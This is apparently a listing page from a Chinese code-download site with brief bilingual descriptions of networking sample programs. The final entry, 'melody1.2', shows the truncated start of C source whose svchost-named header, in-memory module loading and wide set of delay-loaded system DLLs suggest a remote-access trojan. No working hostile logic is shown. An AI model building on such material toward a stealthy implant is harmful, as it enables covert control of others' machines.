-
WinInet API下载文件
WinInet API 实现文件多线程下载 进度事实显示 不可多的的好代码-WinInet API download file
- 2022-07-22 06:19:36下载
- 积分:1
-
获得本机主机名称和IP
获得本机主机名称和IP-Access to the local host name and IP
- 2022-03-17 12:21:21下载
- 积分:1
-
采用mfc框架的 ftp 服务器端。支持断点续传等功能
采用mfc框架的 ftp 服务器端。支持断点续传等功能-Mfc framework using ftp server-side. Features such as support for HTTP
- 2022-01-25 19:39:39下载
- 积分:1
-
输入局域网中的主机的IP地址就可以得到对方的MAC地址!
输入局域网中的主机的IP地址就可以得到对方的MAC地址!-importation hosts on the LAN IP address can be on the other side of the MAC address!
- 2023-05-29 19:05:03下载
- 积分:1
-
newptop网络应用程序,实现点对点的快速通信,是目前非常流行的网络应用程序,该程序是服务器端的开发。...
newptop网络应用程序,实现点对点的快速通信,是目前非常流行的网络应用程序,该程序是服务器端的开发。-newptop network application procedures, the rapid point-to-point communications, is a very popular network application procedures, the procedures for server-side development.
- 2022-03-17 18:57:09下载
- 积分:1
-
Java混淆器 0.9,用于对java代码进行编码
Java混淆器 0.9,用于对java代码进行编码-confused with Java 0.9, java code used to encode
- 2022-04-14 10:46:48下载
- 积分:1
-
一个邮件代理的例子
一个邮件代理的例子--An example of mail-agent
- 2022-12-14 15:15:03下载
- 积分:1
-
一个简易的聊天系统,可以在局域网内聊天,适合在公司不能上网的朋友....
一个简易的聊天系统,可以在局域网内聊天,适合在公司不能上网的朋友.-A simple chat system, you can chat in the LAN for Internet access in the company should not friends.
- 2023-08-20 18:55:03下载
- 积分:1
-
这是一个简单的socket编程的例子,它是基于TCP协议的,从中可以看出用TCP建立连接时客户端和服务器端的程序流程,可以用来测试本地环路。...
这是一个简单的socket编程的例子,它是基于TCP协议的,从中可以看出用TCP建立连接时客户端和服务器端的程序流程,可以用来测试本地环路。-This is a simple example of the programming socket, which is based on TCP, can be seen with the establishment of TCP connections client and server-side program flow can be used to test the local loop.
- 2022-01-26 02:22:56下载
- 积分:1
-
melody1.2 源码
#include "MemoryModule.h"
#include "resource.h"
#include "C_svchost.h"
typedef int (WINAPI *PFN_POPMSGBOX)(void);
#pragma comment(linker, "/DELAYLOAD:WININET.dll")
#pragma comment(linker, "/DELAYLOAD:WS2_32.dll")
#pragma comment(linker, "/DELAYLOAD:PSAPI.DLL")
#pragma comment(linker, "/DELAYLOAD:GDI32.dll")
#pragma comment(linker, "/DELAYLOAD:ADVAPI32.dll")
#pragma comment(linker, "/DELAYLOAD:SHELL32.dll")
#pragma comment(linker, "/DELAYLOAD:SHLWAPI.dll")
#pragma comment(linker, "/DELAYLOAD:MSVFW32.dll")
#pragma comment(linker, "/DELAYLOAD:WINMM.dll")
#pragma comment(linker, "/DELAYLOAD:USER32.dll")
#pragma comment(linker, "/DELAYLOAD:WTSAPI32.dll")
#pragma comment(linker, "/DELAYLOAD:IMM32.dll")
#pragma comment(linker, "/DELAY:nobind")
#pragma comment(linker, "/DELAY:unload")
#pragma comment(lib, "DELAYIMP.LIB")
#pragma comment(linker, "/DELAYLOAD:USER32
- 2022-08-24 08:05:56下载
- 积分:1